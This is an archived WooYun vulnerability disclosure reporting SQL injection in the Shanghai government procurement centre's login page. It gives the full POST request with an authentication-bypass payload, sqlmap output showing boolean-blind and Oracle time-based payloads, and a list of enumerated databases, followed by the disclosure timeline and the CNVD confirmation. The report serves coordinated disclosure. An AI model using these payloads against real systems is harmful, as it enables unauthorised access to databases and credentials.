乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-26: 细节已通知厂商并且等待厂商处理中 2015-01-29: 厂商已经确认,细节仅向厂商公开 2015-02-08: 细节向核心白帽子及相关领域专家公开 2015-02-18: 细节向普通白帽子公开 2015-02-28: 细节向实习白帽子公开 2015-03-12: 细节向公众公开
上海政府采购中心SQL注射漏洞.
1#sql注射点
http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jsp
POST /net/center/stocklogin.jsp HTTP/1.1Host: www.shzfcg.gov.cn:8090Proxy-Connection: keep-aliveContent-Length: 96Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.shzfcg.gov.cn:8090User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)Content-Type: application/x-www-form-urlencodedReferer: http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.8Cookie: JSESSIONID=52QKJDLQlqvdZ2kwJhJPLhVdhc7YSGhr5lT91KncHQhpk2cyZqRf!648548179operator_name=1%27or%271%27%3D%271&operator_pwd=1%27or%271%27%3D%271&opstatus=login&screenwidth=
2#数据库信息
sqlmap identified the following injection points with a total of 265 HTTP(s) requests:---Parameter: operator_pwd (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: operator_name=1'or'1'='1&operator_pwd=1'or'1'='1' AND 3559=3559 AND 'hDvf'='hDvf&opstatus=login&screenwidth= Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: operator_name=1'or'1'='1&operator_pwd=1'or'1'='1' AND 4645=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(99)||CHR(122)||CHR(108),5) AND 'dQJJ'='dQJJ&opstatus=login&screenwidth=---web application technology: Servlet 2.5, JSP 2.1back-end DBMS: Oracleavailable databases [19]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] ITCDQ2[*] JK[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SHTEST[*] SHZFCG[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
19个数据库,当然数据库账户密码信息一样出来3#注射图片
PS:另一个注射点
http://www.shzfcg.gov.cn:8090/login/login_quxian.jsp
过滤.
危害等级:中
漏洞Rank:10
确认时间:2015-01-29 14:24
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给上海分中心,由上海分中心后续协调网站管理单位处置。
暂无